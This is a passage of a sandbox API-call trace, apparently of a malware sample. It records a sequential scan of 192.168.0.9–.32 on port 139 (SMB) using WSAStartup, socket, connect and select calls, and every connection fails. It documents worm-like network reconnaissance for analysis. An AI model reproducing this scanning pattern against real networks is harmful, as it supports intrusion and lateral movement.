returned 0x0 [0129.288] SetLastError (dwErrCode=0x0) [0129.288] htonl (hostlong=0xc0a80009) returned 0x900a8c0 [0129.288] inet_ntoa (in=0x900a8c0) returned="192.168.0.9" [0129.288] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0129.288] socket (af=2, type=1, protocol=6) returned 0x3b4 [0129.288] inet_addr (cp="192.168.0.9") returned 0x900a8c0 [0129.288] htons (hostshort=0x8b) returned 0x8b00 [0129.288] ioctlsocket (in: s=0x3b4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0129.288] connect (s=0x3b4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.9"), namelen=16) returned -1 [0129.288] ioctlsocket (in: s=0x3b4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0129.289] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0130.303] __WSAFDIsSet (param_1=0x3b4, param_2=0x346f960) returned 0 [0130.303] GetLastError () returned 0x0 [0130.303] SetLastError (dwErrCode=0x0) [0130.303] GetLastError () returned 0x0 [0130.303] SetLastError (dwErrCode=0x0) [0130.303] htonl (hostlong=0xc0a8000a) returned 0xa00a8c0 [0130.303] inet_ntoa (in=0xa00a8c0) returned="192.168.0.10" [0130.303] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0130.303] socket (af=2, type=1, protocol=6) returned 0x3d0 [0130.303] inet_addr (cp="192.168.0.10") returned 0xa00a8c0 [0130.303] htons (hostshort=0x8b) returned 0x8b00 [0130.303] ioctlsocket (in: s=0x3d0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0130.303] connect (s=0x3d0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.10"), namelen=16) returned -1 [0130.303] ioctlsocket (in: s=0x3d0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0130.303] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0131.315] __WSAFDIsSet (param_1=0x3d0, param_2=0x346f960) returned 0 [0131.315] GetLastError () returned 0x0 [0131.316] SetLastError (dwErrCode=0x0) [0131.316] GetLastError () returned 0x0 [0131.316] SetLastError (dwErrCode=0x0) [0131.316] htonl (hostlong=0xc0a8000b) returned 0xb00a8c0 [0131.316] inet_ntoa (in=0xb00a8c0) returned="192.168.0.11" [0131.316] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0131.316] socket (af=2, type=1, protocol=6) returned 0x3d4 [0131.316] inet_addr (cp="192.168.0.11") returned 0xb00a8c0 [0131.316] htons (hostshort=0x8b) returned 0x8b00 [0131.316] ioctlsocket (in: s=0x3d4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0131.316] connect (s=0x3d4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.11"), namelen=16) returned -1 [0131.316] ioctlsocket (in: s=0x3d4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0131.316] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0132.331] __WSAFDIsSet (param_1=0x3d4, param_2=0x346f960) returned 0 [0132.331] GetLastError () returned 0x0 [0132.331] SetLastError (dwErrCode=0x0) [0132.331] GetLastError () returned 0x0 [0132.331] SetLastError (dwErrCode=0x0) [0132.331] htonl (hostlong=0xc0a8000c) returned 0xc00a8c0 [0132.331] inet_ntoa (in=0xc00a8c0) returned="192.168.0.12" [0132.331] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0132.331] socket (af=2, type=1, protocol=6) returned 0x3bc [0132.331] inet_addr (cp="192.168.0.12") returned 0xc00a8c0 [0132.331] htons (hostshort=0x8b) returned 0x8b00 [0132.331] ioctlsocket (in: s=0x3bc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0132.331] connect (s=0x3bc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.12"), namelen=16) returned -1 [0132.331] ioctlsocket (in: s=0x3bc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0132.331] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0133.344] __WSAFDIsSet (param_1=0x3bc, param_2=0x346f960) returned 0 [0133.344] GetLastError () returned 0x0 [0133.344] SetLastError (dwErrCode=0x0) [0133.344] GetLastError () returned 0x0 [0133.344] SetLastError (dwErrCode=0x0) [0133.344] htonl (hostlong=0xc0a8000d) returned 0xd00a8c0 [0133.344] inet_ntoa (in=0xd00a8c0) returned="192.168.0.13" [0133.344] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0133.344] socket (af=2, type=1, protocol=6) returned 0x3e4 [0133.344] inet_addr (cp="192.168.0.13") returned 0xd00a8c0 [0133.344] htons (hostshort=0x8b) returned 0x8b00 [0133.344] ioctlsocket (in: s=0x3e4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0133.344] connect (s=0x3e4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.13"), namelen=16) returned -1 [0133.345] ioctlsocket (in: s=0x3e4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0133.345] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0134.369] __WSAFDIsSet (param_1=0x3e4, param_2=0x346f960) returned 0 [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] GetLastError () returned 0x0 [0134.369] SetLastError (dwErrCode=0x0) [0134.369] htonl (hostlong=0xc0a8000e) returned 0xe00a8c0 [0134.369] inet_ntoa (in=0xe00a8c0) returned="192.168.0.14" [0134.369] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0134.369] socket (af=2, type=1, protocol=6) returned 0x3f0 [0134.369] inet_addr (cp="192.168.0.14") returned 0xe00a8c0 [0134.370] htons (hostshort=0x8b) returned 0x8b00 [0134.370] ioctlsocket (in: s=0x3f0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0134.370] connect (s=0x3f0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.14"), namelen=16) returned -1 [0134.370] ioctlsocket (in: s=0x3f0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0134.370] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0135.512] __WSAFDIsSet (param_1=0x3f0, param_2=0x346f960) returned 0 [0135.512] GetLastError () returned 0x0 [0135.512] SetLastError (dwErrCode=0x0) [0135.512] GetLastError () returned 0x0 [0135.512] SetLastError (dwErrCode=0x0) [0135.512] htonl (hostlong=0xc0a8000f) returned 0xf00a8c0 [0135.512] inet_ntoa (in=0xf00a8c0) returned="192.168.0.15" [0135.512] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0135.512] socket (af=2, type=1, protocol=6) returned 0x3f4 [0135.512] inet_addr (cp="192.168.0.15") returned 0xf00a8c0 [0135.512] htons (hostshort=0x8b) returned 0x8b00 [0135.512] ioctlsocket (in: s=0x3f4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0135.512] connect (s=0x3f4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.15"), namelen=16) returned -1 [0135.513] ioctlsocket (in: s=0x3f4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0135.513] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0136.528] __WSAFDIsSet (param_1=0x3f4, param_2=0x346f960) returned 0 [0136.528] GetLastError () returned 0x0 [0136.528] SetLastError (dwErrCode=0x0) [0136.528] GetLastError () returned 0x0 [0136.528] SetLastError (dwErrCode=0x0) [0136.528] htonl (hostlong=0xc0a80010) returned 0x1000a8c0 [0136.528] inet_ntoa (in=0x1000a8c0) returned="192.168.0.16" [0136.528] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0136.528] socket (af=2, type=1, protocol=6) returned 0x404 [0136.528] inet_addr (cp="192.168.0.16") returned 0x1000a8c0 [0136.528] htons (hostshort=0x8b) returned 0x8b00 [0136.528] ioctlsocket (in: s=0x404, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0136.528] connect (s=0x404, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.16"), namelen=16) returned -1 [0136.528] ioctlsocket (in: s=0x404, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0136.529] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0137.540] __WSAFDIsSet (param_1=0x404, param_2=0x346f960) returned 0 [0137.540] GetLastError () returned 0x0 [0137.540] SetLastError (dwErrCode=0x0) [0137.540] GetLastError () returned 0x0 [0137.540] SetLastError (dwErrCode=0x0) [0137.540] htonl (hostlong=0xc0a80011) returned 0x1100a8c0 [0137.540] inet_ntoa (in=0x1100a8c0) returned="192.168.0.17" [0137.540] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0137.540] socket (af=2, type=1, protocol=6) returned 0x3e0 [0137.540] inet_addr (cp="192.168.0.17") returned 0x1100a8c0 [0137.540] htons (hostshort=0x8b) returned 0x8b00 [0137.540] ioctlsocket (in: s=0x3e0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0137.540] connect (s=0x3e0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.17"), namelen=16) returned -1 [0137.541] ioctlsocket (in: s=0x3e0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0137.541] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0138.619] __WSAFDIsSet (param_1=0x3e0, param_2=0x346f960) returned 0 [0138.619] GetLastError () returned 0x0 [0138.620] SetLastError (dwErrCode=0x0) [0138.620] GetLastError () returned 0x0 [0138.620] SetLastError (dwErrCode=0x0) [0138.620] htonl (hostlong=0xc0a80012) returned 0x1200a8c0 [0138.620] inet_ntoa (in=0x1200a8c0) returned="192.168.0.18" [0138.620] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0138.620] socket (af=2, type=1, protocol=6) returned 0x418 [0138.620] inet_addr (cp="192.168.0.18") returned 0x1200a8c0 [0138.620] htons (hostshort=0x8b) returned 0x8b00 [0138.620] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0138.620] connect (s=0x418, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.18"), namelen=16) returned -1 [0138.620] ioctlsocket (in: s=0x418, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0138.620] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0139.630] __WSAFDIsSet (param_1=0x418, param_2=0x346f960) returned 0 [0139.630] GetLastError () returned 0x0 [0139.630] SetLastError (dwErrCode=0x0) [0139.630] GetLastError () returned 0x0 [0139.631] SetLastError (dwErrCode=0x0) [0139.631] htonl (hostlong=0xc0a80013) returned 0x1300a8c0 [0139.631] inet_ntoa (in=0x1300a8c0) returned="192.168.0.19" [0139.631] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0139.631] socket (af=2, type=1, protocol=6) returned 0x41c [0139.631] inet_addr (cp="192.168.0.19") returned 0x1300a8c0 [0139.631] htons (hostshort=0x8b) returned 0x8b00 [0139.631] ioctlsocket (in: s=0x41c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0139.631] connect (s=0x41c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.19"), namelen=16) returned -1 [0139.631] ioctlsocket (in: s=0x41c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0139.631] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0140.645] __WSAFDIsSet (param_1=0x41c, param_2=0x346f960) returned 0 [0140.645] GetLastError () returned 0x0 [0140.645] SetLastError (dwErrCode=0x0) [0140.645] GetLastError () returned 0x0 [0140.645] SetLastError (dwErrCode=0x0) [0140.645] htonl (hostlong=0xc0a80014) returned 0x1400a8c0 [0140.646] inet_ntoa (in=0x1400a8c0) returned="192.168.0.20" [0140.646] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0140.646] socket (af=2, type=1, protocol=6) returned 0x410 [0140.646] inet_addr (cp="192.168.0.20") returned 0x1400a8c0 [0140.646] htons (hostshort=0x8b) returned 0x8b00 [0140.646] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0140.646] connect (s=0x410, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.20"), namelen=16) returned -1 [0140.646] ioctlsocket (in: s=0x410, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0140.646] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0141.659] __WSAFDIsSet (param_1=0x410, param_2=0x346f960) returned 0 [0141.659] GetLastError () returned 0x0 [0141.659] SetLastError (dwErrCode=0x0) [0141.659] GetLastError () returned 0x0 [0141.659] SetLastError (dwErrCode=0x0) [0141.659] htonl (hostlong=0xc0a80015) returned 0x1500a8c0 [0141.659] inet_ntoa (in=0x1500a8c0) returned="192.168.0.21" [0141.659] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0141.659] socket (af=2, type=1, protocol=6) returned 0x430 [0141.659] inet_addr (cp="192.168.0.21") returned 0x1500a8c0 [0141.659] htons (hostshort=0x8b) returned 0x8b00 [0141.659] ioctlsocket (in: s=0x430, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0141.659] connect (s=0x430, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.21"), namelen=16) returned -1 [0141.660] ioctlsocket (in: s=0x430, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0141.660] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0142.674] __WSAFDIsSet (param_1=0x430, param_2=0x346f960) returned 0 [0142.674] GetLastError () returned 0x0 [0142.674] SetLastError (dwErrCode=0x0) [0142.674] GetLastError () returned 0x0 [0142.674] SetLastError (dwErrCode=0x0) [0142.674] htonl (hostlong=0xc0a80016) returned 0x1600a8c0 [0142.674] inet_ntoa (in=0x1600a8c0) returned="192.168.0.22" [0142.674] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0142.674] socket (af=2, type=1, protocol=6) returned 0x428 [0142.674] inet_addr (cp="192.168.0.22") returned 0x1600a8c0 [0142.674] htons (hostshort=0x8b) returned 0x8b00 [0142.674] ioctlsocket (in: s=0x428, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0142.674] connect (s=0x428, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.22"), namelen=16) returned -1 [0142.675] ioctlsocket (in: s=0x428, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0142.675] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0143.688] __WSAFDIsSet (param_1=0x428, param_2=0x346f960) returned 0 [0143.688] GetLastError () returned 0x0 [0143.688] SetLastError (dwErrCode=0x0) [0143.688] GetLastError () returned 0x0 [0143.688] SetLastError (dwErrCode=0x0) [0143.688] htonl (hostlong=0xc0a80017) returned 0x1700a8c0 [0143.688] inet_ntoa (in=0x1700a8c0) returned="192.168.0.23" [0143.688] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0143.688] socket (af=2, type=1, protocol=6) returned 0x444 [0143.688] inet_addr (cp="192.168.0.23") returned 0x1700a8c0 [0143.688] htons (hostshort=0x8b) returned 0x8b00 [0143.688] ioctlsocket (in: s=0x444, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0143.688] connect (s=0x444, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.23"), namelen=16) returned -1 [0143.689] ioctlsocket (in: s=0x444, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0143.689] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0144.700] __WSAFDIsSet (param_1=0x444, param_2=0x346f960) returned 0 [0144.700] GetLastError () returned 0x0 [0144.700] SetLastError (dwErrCode=0x0) [0144.700] GetLastError () returned 0x0 [0144.700] SetLastError (dwErrCode=0x0) [0144.701] htonl (hostlong=0xc0a80018) returned 0x1800a8c0 [0144.701] inet_ntoa (in=0x1800a8c0) returned="192.168.0.24" [0144.701] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0144.701] socket (af=2, type=1, protocol=6) returned 0x448 [0144.701] inet_addr (cp="192.168.0.24") returned 0x1800a8c0 [0144.701] htons (hostshort=0x8b) returned 0x8b00 [0144.701] ioctlsocket (in: s=0x448, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0144.701] connect (s=0x448, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.24"), namelen=16) returned -1 [0144.701] ioctlsocket (in: s=0x448, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0144.701] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0145.716] __WSAFDIsSet (param_1=0x448, param_2=0x346f960) returned 0 [0145.716] GetLastError () returned 0x0 [0145.716] SetLastError (dwErrCode=0x0) [0145.716] GetLastError () returned 0x0 [0145.716] SetLastError (dwErrCode=0x0) [0145.716] htonl (hostlong=0xc0a80019) returned 0x1900a8c0 [0145.716] inet_ntoa (in=0x1900a8c0) returned="192.168.0.25" [0145.716] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0145.716] socket (af=2, type=1, protocol=6) returned 0x43c [0145.716] inet_addr (cp="192.168.0.25") returned 0x1900a8c0 [0145.716] htons (hostshort=0x8b) returned 0x8b00 [0145.716] ioctlsocket (in: s=0x43c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0145.716] connect (s=0x43c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.25"), namelen=16) returned -1 [0145.716] ioctlsocket (in: s=0x43c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0145.716] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0146.755] __WSAFDIsSet (param_1=0x43c, param_2=0x346f960) returned 0 [0146.755] GetLastError () returned 0x0 [0146.755] SetLastError (dwErrCode=0x0) [0146.755] GetLastError () returned 0x0 [0146.755] SetLastError (dwErrCode=0x0) [0146.755] htonl (hostlong=0xc0a8001a) returned 0x1a00a8c0 [0146.755] inet_ntoa (in=0x1a00a8c0) returned="192.168.0.26" [0146.755] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0146.755] socket (af=2, type=1, protocol=6) returned 0x450 [0146.755] inet_addr (cp="192.168.0.26") returned 0x1a00a8c0 [0146.755] htons (hostshort=0x8b) returned 0x8b00 [0146.755] ioctlsocket (in: s=0x450, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0146.755] connect (s=0x450, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.26"), namelen=16) returned -1 [0146.756] ioctlsocket (in: s=0x450, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0146.756] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0147.759] __WSAFDIsSet (param_1=0x450, param_2=0x346f960) returned 0 [0147.759] GetLastError () returned 0x0 [0147.759] SetLastError (dwErrCode=0x0) [0147.759] GetLastError () returned 0x0 [0147.759] SetLastError (dwErrCode=0x0) [0147.759] htonl (hostlong=0xc0a8001b) returned 0x1b00a8c0 [0147.759] inet_ntoa (in=0x1b00a8c0) returned="192.168.0.27" [0147.759] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0147.759] socket (af=2, type=1, protocol=6) returned 0x464 [0147.760] inet_addr (cp="192.168.0.27") returned 0x1b00a8c0 [0147.760] htons (hostshort=0x8b) returned 0x8b00 [0147.760] ioctlsocket (in: s=0x464, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0147.760] connect (s=0x464, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.27"), namelen=16) returned -1 [0147.760] ioctlsocket (in: s=0x464, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0147.760] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0148.772] __WSAFDIsSet (param_1=0x464, param_2=0x346f960) returned 0 [0148.772] GetLastError () returned 0x0 [0148.772] SetLastError (dwErrCode=0x0) [0148.772] GetLastError () returned 0x0 [0148.772] SetLastError (dwErrCode=0x0) [0148.772] htonl (hostlong=0xc0a8001c) returned 0x1c00a8c0 [0148.772] inet_ntoa (in=0x1c00a8c0) returned="192.168.0.28" [0148.772] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0148.772] socket (af=2, type=1, protocol=6) returned 0x108 [0148.773] inet_addr (cp="192.168.0.28") returned 0x1c00a8c0 [0148.773] htons (hostshort=0x8b) returned 0x8b00 [0148.773] ioctlsocket (in: s=0x108, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0148.773] connect (s=0x108, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.28"), namelen=16) returned -1 [0148.773] ioctlsocket (in: s=0x108, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0148.773] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0149.787] __WSAFDIsSet (param_1=0x108, param_2=0x346f960) returned 0 [0149.787] GetLastError () returned 0x0 [0149.787] SetLastError (dwErrCode=0x0) [0149.787] GetLastError () returned 0x0 [0149.787] SetLastError (dwErrCode=0x0) [0149.787] htonl (hostlong=0xc0a8001d) returned 0x1d00a8c0 [0149.787] inet_ntoa (in=0x1d00a8c0) returned="192.168.0.29" [0149.787] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0149.787] socket (af=2, type=1, protocol=6) returned 0x468 [0149.787] inet_addr (cp="192.168.0.29") returned 0x1d00a8c0 [0149.787] htons (hostshort=0x8b) returned 0x8b00 [0149.787] ioctlsocket (in: s=0x468, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0149.788] connect (s=0x468, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.29"), namelen=16) returned -1 [0149.788] ioctlsocket (in: s=0x468, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0149.788] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0150.800] __WSAFDIsSet (param_1=0x468, param_2=0x346f960) returned 0 [0150.800] GetLastError () returned 0x0 [0150.800] SetLastError (dwErrCode=0x0) [0150.800] GetLastError () returned 0x0 [0150.800] SetLastError (dwErrCode=0x0) [0150.800] htonl (hostlong=0xc0a8001e) returned 0x1e00a8c0 [0150.800] inet_ntoa (in=0x1e00a8c0) returned="192.168.0.30" [0150.800] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0150.800] socket (af=2, type=1, protocol=6) returned 0x46c [0150.801] inet_addr (cp="192.168.0.30") returned 0x1e00a8c0 [0150.801] htons (hostshort=0x8b) returned 0x8b00 [0150.801] ioctlsocket (in: s=0x46c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0150.801] connect (s=0x46c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.30"), namelen=16) returned -1 [0150.801] ioctlsocket (in: s=0x46c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0150.801] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0151.815] __WSAFDIsSet (param_1=0x46c, param_2=0x346f960) returned 0 [0151.815] GetLastError () returned 0x0 [0151.815] SetLastError (dwErrCode=0x0) [0151.815] GetLastError () returned 0x0 [0151.815] SetLastError (dwErrCode=0x0) [0151.815] htonl (hostlong=0xc0a8001f) returned 0x1f00a8c0 [0151.815] inet_ntoa (in=0x1f00a8c0) returned="192.168.0.31" [0151.815] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0151.815] socket (af=2, type=1, protocol=6) returned 0x478 [0151.815] inet_addr (cp="192.168.0.31") returned 0x1f00a8c0 [0151.815] htons (hostshort=0x8b) returned 0x8b00 [0151.815] ioctlsocket (in: s=0x478, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0151.815] connect (s=0x478, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.31"), namelen=16) returned -1 [0151.816] ioctlsocket (in: s=0x478, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0151.816] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0152.828] __WSAFDIsSet (param_1=0x478, param_2=0x346f960) returned 0 [0152.828] GetLastError () returned 0x0 [0152.828] SetLastError (dwErrCode=0x0) [0152.828] GetLastError () returned 0x0 [0152.828] SetLastError (dwErrCode=0x0) [0152.828] htonl (hostlong=0xc0a80020) returned 0x2000a8c0 [0152.828] inet_ntoa (in=0x2000a8c0) returned="192.168.0.32" [0152.828] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0152.828] socket (af=2, type=1, protocol=6) returned 0x47c [0152.828] inet_addr (cp="192.168.0.32") returned 0x2000a8c0 [0152.828] htons (hostshort=0x8b) returned 0x8b00 [0152.828] ioctlsocket (in: s=0x47c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0152.828] connect (s=0x47c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.32"), namelen=16) returned -1 [0152.829] 